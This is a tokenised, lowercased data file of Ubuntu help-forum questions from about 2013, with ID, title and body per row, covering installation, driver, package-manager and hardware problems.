323591	ubuntu 12.04 apt-get update failing	i have a brand new , fresh install of 12.04 lts . when i attempt to run a simple apt-get update this is what i get : ign http : /us.archive.ubuntu.com precise inrelease ign http : /security.ubuntu.com precise-security inrelease get:1 http : /security.ubuntu.com precise-security release.gpg [ 198 b ] get:2 http : /security.ubuntu.com precise-security release [ 49.6 kb ] get:3 http : /security.ubuntu.com precise-security/main sources [ 83.5 kb ] get:4 http : /security.ubuntu.com precise-security/restricted sources [ 2,494 b ] get:5 http : /security.ubuntu.com precise-security/universe sources [ 2,371 b ] get:6 http : /security.ubuntu.com precise-security/multiverse sources [ 74 b ] 100 % [ 6 sources bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:7 http : /security.ubuntu.com precise-security/main amd64 packages [ 71 b ] 100 % [ 7 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:8 http : /security.ubuntu.com precise-security/restricted amd64 packages [ 72 b ] 100 % [ 8 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:9 http : /security.ubuntu.com precise-security/universe amd64 packages [ 73 b ] 100 % [ 9 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:10 http : /security.ubuntu.com precise-security/multiverse amd64 packages [ 1,245 b ] 100 % [ 10 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:11 http : /security.ubuntu.com precise-security/main i386 packages [ 369 kb ] 100 % [ 11 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:12 http : /security.ubuntu.com precise-security/restricted i386 packages [ 4,872 b ] 100 % [ 12 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:13 http : /security.ubuntu.com precise-security/universe i386 packages [ 97.0 kb ] 100 % [ 13 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:14 http : /security.ubuntu.com precise-security/multiverse i386 packages [ 1,969 b ] 100 % [ 14 packages bzip2 0 b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . get:15 http : /security.ubuntu.com precise-security/main translationindex [ 389 kb ] get:16 http : /security.ubuntu.com precise-security/multiverse translationindex [ 4,863 b ] get:17 http : /security.ubuntu.com precise-security/restricted translationindex [ 100 kb ] e : unable to parse package file /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_restricted_i18n_index ( 1 ) root @ ssc-nagios : /etc/apt # i have read every thread , tried every result i could find and rebuilt the machine twice already . can anyone help ?
323595	sim locked after reinstalling android on nexus having ubuntu touch in it	i 've just tried ubuntu touch on my nexus smartphone . it was already sim unlocked before the operation . then i deployed the android build , following your tutorial , but now my phone is sim locked ! does anyone have an idea about this ?
323598	stuck starting cups-browsed	i 'm trying to install ubuntu 13.04 on dell xps630i with no success . there 's two problems : bootloader does not install via ubuntu installer . resolved this with the help of repair-boot . mentioning this in case it has any effect on the next problem after installation , ubuntu hangs during boot on cup-browsed . hdd led just keeps blinking every second and that is it ( tried leaving it like this for 30 minutes ) . here 's the boot log ( when i press esc ) : * starting mdns/dns-sd daemon [ ok ] * starting blueatooth daemon [ ok ] * starting cups printing spooler/server [ ok ] * starting cups-browsed - bonjour remote printer browsing daemon i tried both 32 and 64 bit versions - same problem . computer specs - dell xps630i : intel core 2 quad q6600 / 2.4 ghz xfx ati hd 5770 nvidia nforce 650i sli chipset 4 x 2gb kingston ddr2 nvidia nforce raid controller with 2 x 320gb raid 0 and 1 x 500gb raid 0 auzentech forte 7.1 audio
323600	ubuntu partition/dual-boot help !	i recently got a pc with windows 8 pre-installed . it has a 1tb hdd and 24gb ssd . so i decided to dual-boot with ubuntu , using the simple method ( `` install ubuntu beside w8 '' ) . however , the only disk space that popped up for the partition to be made was the ssd , which i assumed i could use just to install the ubunto os . now , when running ubuntu it says there is not enough room for files and things . i then went and partitioned my hdd for 250gb space to use for ubuntu ( now unallocated ) but i have no idea how to make ubuntu use that free space for the necessary files instead of the ssd . if i restart the ubuntu installation , will it work ( select `` manual setup '' and then pick the hdd ) or will it see that i already have ubuntu on the ssd and not allow me to set it up ? is there any way to keep the ubuntu on the ssd and then set up the 250gb hdd partition to use for files ? or any way to move the ubuntu to the hdd instead of the ssd ?
323602	remove openjdk 7 , install openjdk 6 ?	i need to be using openjdk 6 but can not figure out how remove openjdk 7 . i used the apt-get purge command and it seems to be successful but even after installing openjdk 6 , java -version always returns java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.13.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) what can i do to fix this ?
323606	twitter client replacement in ubuntu 12.04 precise ?	gwibber in 12.04 no longer works with twitter . ( i believe because the api changed ) . it appears that its replacement , friends-app , can not be installed in precise ( as per install latest gwibber ( friends-app ) in ubuntu 12.04 ? ) . so what 's a replacement/workaround for a twitter client in ubuntu 12.04 ? i 've tried hotot and it 's also broken for the same reason .
323617	keyboard layout settings do not survive reboot	i 'm on xubuntu 12.04 . i use hebrew as well as english us . when i installed xubuntu i added hebrew via the keyboard layout settings and set alt-shift as the change layout shortcut . in both cases when i 've installed xubuntu , this worked well and no issues . after everything worked fine on this laptop , it all of a sudden started to misbehave . every time i restart , the keyboard layout settings revert to only us and the change layout shortcut is forgotten . i re-add the language and update the change layout shortcut and it forgets it again after reboot . i do n't believe i 've changed anything , but i must have ( or an update caused it ? ) . where is the keyboard layout configuration saved ?
323620	tried install of ubuntu onto gateway nv79 = ends up with dark screen	okay , i 'm a total newbie , so i apologize in advance if i do n't word this correctly . : ) i am trying to install ubuntu ( tried several versions ) onto a gateway nv79 laptop , using a usb drive . everything goes fine until i hit `` enter '' to install ubuntu onto hard drive - i get the initial `` rolling lines '' indicating it is attempting install , then my screen goes dark - not blank or black - i can barely make out various windows if i hold up screen to light . i 've tried the brightness hotkeys , to no avail . i tried to look in forums , but they are currently down due to security breach . this was my first attempt at actually installing ubuntu , although i have used it numerous times to rescue data from a crashed windows system . i am not a techie , nor do i understand much about hardware/os ... what can i say , my computer knowledge is limited , to say the least . : ) if i attach another monitor to my laptop , both screens suddenly work perfectly , but instead of being able to install ubuntu , i am getting error messages and it terminates install . is there a relatively simple way to correct this issue or is it something that will require someone with much more computer savvy than myself to address ? thank you for any assistance you may be able to provide . have a great day .
323621	nouveau unknown fermi chipset	i 've installed a fresh install of ubuntu 13.04 and whenever i start my laptop i get this output error [ 19.469816 ] nouveau ! [ device ] [ 0000:01:00.0 ] unknown fermi chipset [ 19.469846 ] nouveau e [ device ] [ 0000:01:00.0 ] unknown chipset , 0x0d7000a2 [ 19.469870 ] nouveau e [ drm ] failed to create 0x80000080 , -22 [ 19.470095 ] nouveau : probe of 0000:01:00.0 failed with error -22 i have lenovo g580 with nvidia geforce 710m .
323640	how to partition with a 8gb ssd and a 16gb memory card	i would like to use my available memory as a single area . i have a 8gb ssd and a 16gb sd card . i also have 1gb ram . i want to repartition and reinstall ubuntu 12.04 lts . i have been running into problems because of memory limitations although i store very little on the computer , usually not more than 2gb and this temporarily . it would be nice if i also could occasionally use another sd card in the reader to load pictures online . that would mean that i would have to briefly be able to remove the 16gb sd card to insert another one .
323643	how to install bcm4312 drivers in ubuntu 13.04 ?	i just installed ubuntu 13.04 this morning ( new to linux ) . and ever since then i 've been trying to get wifi to work . i found out what the problem was , that i need drivers . my wireless card is bcm4312 and so i need drivers for it . mostly everywhere i 've looked around it says that its easy , i just got ta go to software , and then to the drivers tab and select the driver for my wireless card . the thing is , the list is empty . and i can not connect to the internet using a wired connection at the moment so i tried to find other options . i tried to use a tethering app on my phone called easytether . and when i was going to install the ubuntu software to use it , turns out i just cant click on the `` install '' button . and yes , i tried to install using a command . and i also tried it with the drivers using codes i found online . this question has been asked before , but none of them helped me at all . so i would like an alternative like installing the drivers using another method , or i dont know , anything that gets it to work . a bunch of thanks to anyone who manages to help me ! thanks ! edit : even though i explained my problem as best as possible , nobody helped me . there are many people out there with the same problem i had , and there is n't anything helpful here . i clearly said that there was nothing in `` other drivers '' and yet my question got marked as a duplicate . thanks ! ! and do n't worry , i managed to fix the problem myself .
323645	capturing step by step actions	is there some tool to automated capture of step by step actions and screenshots during some task performing on computer with ubuntu ? p.s . just for illustration , here is one software to capture step by step actions to windows os .
323647	phpmyadmin blank settings page	i just installed phpmyadmin on a clean ubuntu server 13.04 installation . everything in the application works , except for the `` settings '' page . this one page is blank when i click on it and when i attempt to view the source code there is nothing in the source . if i cat the file i can see that the file is not empty . the error log is not helpful - nothing is logged when attempting to view the page . how can i debug or fix this ?
323648	usb mic `` crossed '' with internal mic	i have a laptop and the microphone/headphone jacks has given me problems . i am now forced to use usb sound cards . until a few days ago things were working well with my cheap sabrent usb sound card . i then noticed the microphone is now `` crossed '' / '' mixed '' /confused with the laptops internal webcam microphone . if i go to the sound properties i can select the usb mic but if i touch the webcam mic the levels on the usb mic jump . if i mute the webcam mic the levels on the usb mic never move -- although it does not indicate it is muted . no matter what input i select the webcam mic is the actual mic used . it is like some internal settins are confused/crossed . i then went and bought sound blaster x-fi go ! pro usb adapter and the headphones work fine but the mic does the same as my $ 8 sabrent . i 've tried messing with the gstreamer-properties , remove/add pulseaudio , alsamixer settings . nothing seems to improve matters . has anyone seen this happen ? if so does anybody have any ideas it would be much appreciated ? i 'm running ubuntu 12.04 on an hp laptop .
323651	[ solved - kinda ] re-enabling touchpad after disabling it with xinput ?	so i booted into windows and re-enabled it . however , this method will not work for someone without a windows partition like i have , the only other similar topic was asked in march 27 and was left unanswered . back when i first started with ubuntu , around october , i was attempting to disable my touchpad because fn-f9 ( on my toshiba laptop ) does not work . in my annoyance i used this help and ran this command : xinput set-prop 12 `` device enabled '' 0 i recently had the desire to re-enable my touchpad , and was attempting to do so , but , to my avail , i could not . my settings do not list a touchpad i ran gpointing-device-settings and this only lists my wireless mouse . toggling with synclient touchpadoff=1 synclient touchpadoff=0 has no effect . xinput does not list a touch pad , only a toshiba input device . ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:1025 id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=12 [ slave keyboard ( 3 ) ] ↳ logitech logitech wireless headset id=14 [ slave keyboard ( 3 ) ] touchpad indicator does not allow me to re-enable the touchpad . and so we come back to my original question , how do i re-enable my touchpad
323656	how to install a wd advanced format drive in ubuntu 12.04	i am doing a fresh install with a wd10ezex hard drive and would like to know the steps necessary to align the hard drive correctly and get optimal performance .
323664	wifi ca n't connect , cable connection barely works	i 'm having problems with the internet connection on my ubuntu 13.04 . i deleted windows 7 from my computer ( where the internet worked without any kind of problems ) and installed ubuntu 13.04 , but now i 'm having some trouble here . i ca n't connect to the internet using my wifi , it connects to my router . depending , on the site that i pings on terminal it does n't have answer . i ca n't browse on internet using it and ubuntu ca n't connect to archive.ubuntu to download packages or updates . to used my cable connection i had to restart my notebook some times until it connects and it keeps barely working . it seems like i 'm using a 90 's internet connection . when i try to download or update certain packages , most of the connections to the server are unsuccessful . i 'd like some help , thanks .
323671	password security : ubuntu forums security breach	if the passwords were encrypted is there really a problem ? i have not used the forum for some time and ca n't remember the details . advice please .
323675	problems when installing any package using apt-get install	when installing any package using apt-get install i get this message : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) error 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up gforge-db-postgresql ( 5.1.1-2 ) ... calculating defaults reading defaults from /etc/fusionforge/fusionforge.conf creating /etc/fusionforge/fusionforge.conf creating /etc/gforge/local.inc creating other includes * reloading postgresql 8.4 database server [ ok ] * reloading postgresql 9.1 database server [ ok ] procedural language on gforge already enabled normalizing all roles and permissions php warning : require ( /usr/share/gforge/bin/../www/env.inc.php ) : failed to open stream : no such file or directory in /usr/share/gforge/bin/normalize_roles.php on line 22 php fatal error : require ( ) : failed opening required '/usr/share/gforge/bin/../www/env.inc.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in /usr/share/gforge/bin/normalize_roles.php on line 22 dpkg : error processing gforge-db-postgresql ( -- configure ) : subprocess installed post-installation script returned error exit status 255 no apport report written because maxreports is reached already errors were encountered while processing : gforge-db-postgresql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm using ubuntu 12.04 .
323683	login problem after home folder name changed	i have changed my home folder name through command mv olderfolder newfolder and then restarted , but not able to login . what step did i miss ?
323685	how i create animation like flash	i need to do the small animations in ubuntu 12.04 please let me know what type of animation software are available for ubuntu 12.04 ? if i can install the adobe flash professional to my ubuntu 12.04 is better .
323687	installation of ubuntu 13.04 on virtualbox `` breaks ''	i have tried to install many times the ubuntu linux distro on virtualbox and it worked like a charm . today i have tried to re-install from scratch the latest ubuntu version ( 13.04 ) on the latest virtualbox ( 4.2.16 ) but immediatelly after the installation it prompts an error that compiz has `` crashed '' ... has anybody any similar issue ? thanks in advance .
323693	installing non-standard fonts in xubuntu 13.04	before i start : i 'm a mac user whose 7 year old laptop is slowly dying and , wanting to support open-source software , i 've been considering a linux pre-loaded laptop as my next computer . in preparation for the shock of a new operating system i 've been playing with xubuntu as a vm on my imac for the past couple of days . i love it but i have no idea what i 'm doing really . i am a typography enthusiast and as such ca n't do without gorgeous free fonts . so , despite feeling that the experiment was doomed to failure , i decided to download a heap of fonts and attempt to install them . they were all .ttf format , so i thought it should be possible , and i know where the fonts folder is so i can put them there manually if necessary . but ... nope . i 've been stalled by my number 1 problem since i started playing around with linux : i ca n't find the downloaded files . at all . so i ca n't do anything with them , because i do n't know what they 're called , or where they are , or even if they 're there at all . they were zips and automatically extracted when i downloaded them . at least , i assume they automatically extracted , because the archive manager window appeared to show the files that had been extracted ( when i downloaded the fonts firefox asked me 'open with archive manager ? ' and i said yes . ) as far as i remember it said they were extracted to the home folder . but , as mentioned previously , i ca n't find them . i 've done a catfish file search for .ttf , all hidden files shown ( i do n't put much faith in catfish , as i do n't think it really searches everything , but i was prepared to try anything ) . i also downloaded fonty python to see if it could find them ; i got it to run through every folder and sub-folder on the virtual drive , but nope , it only found the microsoft fonts that were already installed . i looked in the fonts folder myself just in case . no luck . i have no idea what to do . it 's like when i download certain things they just vanish without a trace . as a complete linux newbie , maybe i 'm missing something really obvious here ...
323694	recover windows after deleting ubuntu partion drives	i had both ubuntu and windows 7 installed on my sony-vaio laptop . i was trying to uninstall ubuntu . so for that i tried to format my system using the internal hard disk recovery on my system . but when the format was complete and i restarted it , it wont load windows 7. there it shows the error like `` grub rescue : `` i tried to search on similar problems solutions . but they all need a windows cd . i dont have windows recovery cd but i have recovery on my laptop harddisk itself . help me out to get back .
323700	command line dvd creation with chapters and menu	i have several personal video and i would like to put them on a dvd . i would like to classify them by year ; so the menu would list the year , and each video should be a chapter . i could do that with a gui program like devede , 2mandvd , ... but as i have a lots of videos , and as i just want to organise them by date , it could be faster to automate the creation with a script . so , is there a tool which can create menus and chapter and that i can integrate in a batch script ?
323702	how to capture https traffic	i am trying to capture the requests of my android emulator . i want to know the data used by my android app . i tried various ways which did n't work . i am trying to do that using the emulator now . i have emulated my android device in ubuntu and i want to capture all traffic of my android emulator ( http and https ) using a tool . we have fiddler in windows but this emulator stuff did not work there .
323705	can ubuntu run all types of files , .rar , .zip , etc	i 'm new to ubuntu , and i 'm just now installing it , i 've backed up some files and i 'm going to completely system restore and i 'm saving some files onto .rar 's . from my website database . i was wondering if i can use .rar on ubuntu ?
323706	videos are not playing properly	i installed ubuntu 13.04 on my laptop having ati amd radeon graphics card.but in ubuntu i experience lots of trouble like the videos are not playing flawlessly . sometimes it stucks . i used every graphics drivers in additional drivers list . i install ubuntu restricted extra . but nothing help me . please anyone help me to do this thing right .
323708	how to upgrade/maintain libre office	i am using ubuntu 12.04 lts . i want to know the following how to find the latest version of libre office how to upgrade to the latest version
323720	wget http : //webupd8.googlecode.com/files/script.py not working	while trying to run the below command network unreachable error is coming . wget http : //webupd8.googlecode.com/files/script.py -- 2013-07-24 12:05:23 -- http : //webupd8.googlecode.com/files/script.py resolving webupd8.googlecode.com ( webupd8.googlecode.com ) ... 173.194.70.82 , 2a00:1450:4001 : c02 : :52 connecting to webupd8.googlecode.com ( webupd8.googlecode.com ) |173.194.70.82|:80 ... failed : connection timed out . connecting to webupd8.googlecode.com ( webupd8.googlecode.com ) |2a00:1450:4001 : c02 : :52|:80 ... failed : network is unreachable .
323725	apple magic mouse on ubuntu 13.04 , how can i prevent crashing one > =3 touch points ?	i 'm trying to get my magic mouse to work on ubuntu 13.04 . when i connect it , everything works fine ( have n't tested gestures ) . however , when i touch it with more than 2 touch points , it crashes and fails to work . my guess is that i need specific drivers for this mouse on ubuntu but i ca n't find which ones . the magic mouse i 'm talking about is the 100 % touch , one button wireless . it seems that ubuntu ca n't handle more than 2 touch points , but how can i get it to work so it supports 3 or more ?
323729	xmonad with gnome ubuntu 12.04	i 've grown tired of unity on ubuntu , and decided to try out xmonad . i installed it via sudo apt-get install xmonad . now that i have it , i 'm not sure how to continue . how would i go about setting it as my default window and panel manager instead of unity ?
323730	sound recorder does n't record	with ubuntu 13.04 i noticed that sound recorder seems to be broken , i.e . i ca n't get it to record anything . when i press on the record button the level input remains grayed out . when i open the volume control the top of the list value digital input is always chosen , but i can change it to rear microphone which i see responds nicely on the input level , but sound recorder does n't respond to the change . i tried audacity and there i can choose the source as the rear microphone and audacity works fine . sound recorder used to work as well . skype also works with no problems . any suggestions on how to get it back on line ? thanks , ilan
323739	cant run compiz with gallium driver for ati radeon x1200	i have the same problem with the ati drivers and ubuntu 12.04 . i simply ca n't make the 3d graphics acceleration work with my ati radeon x1200 ( rs 690 ) graphics card . i just use the gallium open driver , but i ca n't run compiz .
323741	can i run xampp installed on windows partition	i have been using xampp on windows 7 . now , i have installed ubuntu 12.04 lts alongside windows . i just want to use my xampp from windows while i 'm on ubuntu . i know how can i install and get running xampp on ubuntu , but there have been many php program files and mysql databases in my windows xampp . i need to run those from ubuntu so that i do n't need to re-install xampp and start from stretch . do i need to use wine to get the windows apache running on my ubuntu ? or any other instruction to accomplish this ?
323743	ubuntu java issue	sorry for the really long question ( i did n't want to miss any info you guys might need ) but please help ! hi , i 've recently purchased a linux vps ( runs ubuntu 64 bit ) i 've been trying to get java to work on it for 3 days now , and i 'm starting to run out of ideas and think about how much i wasted on this vps . i 've tried installing it through : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer ( and java6 the next day - i tried uninstalling it first but not sure if it worked because i got errors ) as well as wget https : //github.com/flexiondotorg/oab-java6/raw/0.2.4/oab-java.sh -o oab-java.sh chmod +x oab-java.sh sudo ./oab-java.sh upon completion of all of these i am able to run a java based game ( the one i 'm trying to host ) but it crashes after a few hours , here is my batch file screen -a -m -d -s rsps java -xmx1700m -classpath bin : deps/gtlvote.jar : deps/poi.jar : deps/mâś server.server to break it down the `` screen -a -m -d -s rsps '' is just to keep the game batch file running when i close the connection through putty . i have also tried editing this java -xmx1700m ( 3 hour crash if i have it at -xmx800m , 6 hour crash if i have it at -xmx1700m ) but it just prolongs how long until java crashes with a hs_err_pid error saying there is insufficient memory for the java runtime environment to continue . and a bunch of other code ( all of it can be found here : http : //pastebin.com/3zbfyble ) also , when i try java -version through putty i get an error saying error occurred during initialization of vm could not reserve enough space for object heap could not create the java virtual machine . i was also able to host this game perfectly fine on a windows vps with similar specs ( a little bit better specs ) 1 possible thing i can think of is the 2 versions of java i 've tried installing have both been a 32 bit version ? other than that i have no clue , any help will be greatly appreciated .
323749	how can i get a vm in virtualbox to use my usb wifi adapter ?	i am trying to run/enable my wireless adapter in backtrack 5 r3 . i have the extension pack and usb filter of my device enabled . the settings under `` network '' in virtualbox are : bridged-adapter : wlan2 promiscuous mode : allow all cable connected . wlan2 is my adpater . whenever i start up backtrack the network settings seem to switch to wlan0 , my wifi card . how can i stop this happening ?
323755	purple screen after booting into single user mode .	i have used ubuntu for two days now when my synaptics touchpad stopped working . it would still be able to click , but not move/tap . i then went to activate additional drivers as it told me i needed to do . after that , it said that in order for these drivers to take effect , i would need to restart my laptop , so i did . the problem is that , when i would boot into ubuntu ( i have dual boot ; windows 7 and ubuntu ) , i would get the usual ubuntu logo and the 5 dots , but then the screen would go black . after asking an it friend of mine who regularly uses ubuntu , he believes i may have a bad xorg.conf file . he suggested i boot into single user mode and try a different user root . i am able to edit grub so as to boot into single user mode , but when i try to actually boot , all i get is a purple screen . no ubuntu logo and no dots underneath . mind you , i am pretty green when it comes to using ubuntu and have been only using google to troubleshoot . if it helps , i have an hp notebook g42 and it 's about 3 years old .
323756	how to properly package an ubuntu touch application with qt creator ( ubuntu sdk )	in the new ubuntu sdk there is an option to `` create application package '' in `` build/ubuntu touch '' . is there any tutoriel to explain how it works ? it seems that it creats a `` debian '' folder with many things in it like the `` control '' and other basic files . the name of the maintainer seems to be taken direcly from the name of the user and its email address is created with the first word . how can i change all of this ? if i change in every files i can find in `` debian '' , it does n't work when i hit the `` create application package '' again . also since i am french and that my firstname has a `` ăš '' , it creats an error in ubuntu software center , which is very infortunate . where can i find some doc about this option in ubuntu sdk ? there is a lot for packaging doc for ubuntu but none for ubuntu touch . thank you and sorry to ask something again but i am new in this kind of things and the tuto on the ubuntu website ( here ) stops before the packaging . it might be a good thing to go from the begining to the end on it .
323759	how safe is ubuntu for `` non-geek '' users	i am a new ubuntu user and i realise there is much to learn , but i am so impressed with the initial look and feel of ubuntu that i am thinking of installing it on my mother and sister 's pc 's . my question is , how vulnerable is linux in general for finger faults from normal everyday windows users ?
323765	how to fix the command-not-found databases ?	my recently installed ubuntu system is currently having issues with the command-not-found hook : josh @ sirius : ~ $ invalid-command unable to open binary database /usr/share/command-not-found/programs.d/i386-main.db : file read error unable to open binary database /usr/share/command-not-found/programs.d/i386-multiverse.db : file read error unable to open binary database /usr/share/command-not-found/programs.d/i386-restricted.db : file read error unable to open binary database /usr/share/command-not-found/programs.d/i386-universe.db : file read error invalid-command : command not found i have tried reinstalling and dpkg-reconfigureing both command-not-found { , -data } but these do n't seem to have fixed it . is it safe to delete these files , or do i have to run some program to recreate them ? i should add that this was originally a 32-bit install that i reinstalled with 64-bit without formatting the disk .
323769	ubuntu alongside windows	is that possible to upgrade ubuntu to never versions when it is installed alongside windows ? now it is currently 12.04 . is that upgradable to 13.04 and future ?
323772	tried to get janitor and got the message for dpkg dependency problem on ubuntu 12.04	dpkg : dependency problems prevent configuration of computer-janitor-gtk : computer-janitor-gtk depends on computer-janitor ( = 2.1.0-0ubuntu8 ) ; however : package computer-janitor is not installed . dpkg : error processing computer-janitor-gtk ( -- configure ) : dependency problems - leaving unconfigured
323775	monitor/watch running rsync process	i have an rsync job that has been added to a crontab and when it 's running , i can only check that there 's a rsync pid and confirm with htop that it 's eating up n amount of cpu and ram . what i 'd like to do is to monitor what files are actually being rsync'ed in realtime ... when i want to . fyi i have n't passed any verbose option to the command nor have i added some logging . i really just want to check what 's being rsync'ed on demand . any idea how i could achieve that ?
323776	gsettings not working over ssh	i 'm trying to change unity launcher icons on a remote computer with command : gsettings set com.canonical.unity.launcher favorites ... and it works perfectly but when i do ssh 127.0.0.1 gsettings set com.canonical.unity.launcher favorites ... i get this : ( process:9616 ) : dconf-warning ** : failed to commit changes to dconf : error spawning command line `dbus-launch -- autolaunch=aaa5bb6eaa7cd50f2af1f10000000004 -- binary-syntax -- close-stderr ' : child process exited with code 1 and that is for any gsettings calls from ssh . where is the problem ?
323778	unbutu iso version for dell inspiron 1150	somebody through a dell inspiron 1150 laptop ( 2004 ) with ubuntu 10.10 on it but it needs a password which i do n't have i tried to install 13.04 but i got an internal error message saying executablepath /usr/lib/nux/unity_support_test than i tried to download the 10.10 version but when i turned on with the burned cd inside it did n't work i 'll be happy if someone could help and would like to help me .
323783	differentiate i.localhost and localhost	what is the difference between http : //i.localhost and http : //localhost . reason for asking this question after installed webmin , i have try to enable ssl from its gui , but it does n't worked . after that i am not able to access localhost , but i can access it using http : //i.localhost also able to access localhost using ip http : //127.0.0.1
323788	ubuntu on mac can not locate via osx or boot it throught refit ...	... it comes up with operating system not found . what do i do ? i recently installed ubuntu along side os x ( snow leopard ) and when i rebooted my macbook and choose ubuntu , i got a message saying operating system not found ... . i thought this maybe have something to do with grub , so i 've tried using the terminal from a live cd but it still is n't working , yet i can still access it through the live cd and see it installed , and there is a whole partition for it . what do i do to get it working ?
323789	example tab in ubuntu sdk opens blank windows	every time i try to open the examples tab on the welcome screen , the sdk opens 3 transparent/blank windows that get in the way and are not closable . there are also no examples in the sdk when the tutorial says there should be . edit : version : qtcreator 2.7.1-0ubuntu1~precise1~test15 i also have all of the add-ons installed . the gnu debugger ( gbd ) documentation for qt creator ide ( qtcreater-doc ) cross-platform , open-source make system ( cmake ) fast , scalable , distributed revision control system ( git ) kmailservice ( kdelibs5-data ) qt quick 1 development files ( qtquick1-5-dev ) qt quick 1 tools ( qtquick1-5-dev-tools ) advanced version control system ( subversion ) ubuntu sdk ( ubuntu-sdk )
323796	steam 's download speed is very low	when using ubuntu ( i 'm using 12.10 ) i get download speeds of about 0 when downloading through steam . if i pause the download then resume , it goes up to normal , then slowly goes back down to 0 . this does not happen in windows .
323797	need suggestion which version of ubuntu is suitable for my machine	i have a acer aspire 4720z laptop . is powered by intel pentium dual-core 32 bit mobile processor . 1 gb ram ( have additional 1 gb but currently it is corrupted would soon replace it ) and 160 gb hard drive . the laptop has mobile intel gl960 express chip set . the acer aspire 4720z notebook comprises inbuilt internal modem , wireless wi-fi , and bluetooth connectivity . currently have windows 7 64 bit os running . can someone please suggest which would be the best version of ubuntu i should install . 1 ) ubuntu 12.04 lts . 2 ) ubuntu 13.04 kindly suggest .
323801	what is `` chmod '' and its practical aspects ?	i am new to ubuntu and i used to do everything on windows . as much as i know windows has `` read only '' file option for the user . however , in my opinion , ubuntu allow the user to manipulate file permissions excessively . drwxrwxrwx 2 ttt ttt 4096 tem 24 13:04 dante there are three groups of user ; owner , group and other respectively . normally the one who creating the file is the owner . then who are the `` group '' and the `` other '' . is this used more for server like systems where there are many user ? even if this is used for security issues , without `` $ sudo '' it can be easily change to whatever wanted . can you also suggest any further reading ? it may be possible that i am exaggerating `` chmod '' , but still i will thank you if you answer .
323802	building .deb file : copy configurations to user settings	i 'm building a deb file for my application following online tutoria and have no major problem . i can specify file to go to /usr/bin , /usr/lib and many system directories . but there are settings that should go on per user basis that is /home/stefano/.myapp or even as per recommendation /home/stefano/.config/myapp but can not find how do i specify that in install file . google did not help at all in this case ( which might be my fault for using bad keyword ) . any idea is welcome !
323804	how to make alt+tab switcher icons smaller	is there any way to reduce the size of the default ubuntu 13.04 window switcher icons , shown when pressing alt+tab ? changing compiz settings ( with a text editor , if not in the ccsm gui ) or installing a different window switcher , for example . thank you for your help , have a good day .
323814	can i install ubuntu on a separate hdd to my windows installation ?	my windows installation is on c drive , and i want to install a new ubuntu installation on d drive . i have some downloads on my d drive like anime and stuff ( nothing directly relating to the windows installation ) . is it possible ? i 've been googling everywhere but the forums are down and i 'm a complete newbie . keep in mind i would rather not format my d drive but if it comes down to it i can . both drives have 300gib free space . even if you forward me onto another site any help would be greatly appreciated ! !
323821	procedure to run ubuntu on sony xperia play	i want to run ubuntu on my sony xperia play phone but i dont know how to do it so if someone can help regarding it will be highly appreciate .
323822	overheating laptop dual ati gpu hd4200 and discrete hd5400	i 've a laptop which until now i 'm using free radeon drivers . now i 'm thinking to switch to the proprietary ati drivers due its cooler temperature . but i 'm not sure what to do . my laptop has two graphic cards : a ) integrated gpu ati mobility hd4200 series b ) discrete gpu ati mobility hd5400 series so , for which gpu should i download the driver and install ? integrated or discrete ? thank you so much ! !
323826	ubuntu edge in japan	i 'm not terribly knowledgeable about cell phones . the edge looks exciting and i like supporting gadgets that are powered by open source , but i live in japan . could somebody point me to online info that would let me know whether or not i could use this device to make phone calls here in japan ?
323838	how can i get non-english characters to render on flash ?	on flash , i 've noticed that kana and other language 's scripts are not rendering properly and replacing themselves with boxes . i have the correct fonts installed and the scripts render well and are fine on all other things except for flash websites . how can i fix this ?
323846	how do i get the brightness keys working on an acer aspireone d255 ?	i 've got a little problem trying to set brightness on a aceraspireone d255 on which i freshly installed xubuntu 13.04 ( 32x ) ... brightness seems to play its own way : it does n't respond to my inputs and on screen it constantly appears a flashing light bulb , even if i do n't type on keyboard ... i 've tried to fix the problem editing the /etc/default/grub at line grub_cmdline_linux= '' '' with grub_cmdline_linux= '' acpi_osi=\ '' ! windows 2012\ '' '' then update and reboot , but no way ... [ got to say , i tried this strategy on my other asus x501a having a similar brightness problem on ubuntu 13.04 ( 64x ) and everything now works perfectly ! ] thank you for your answers
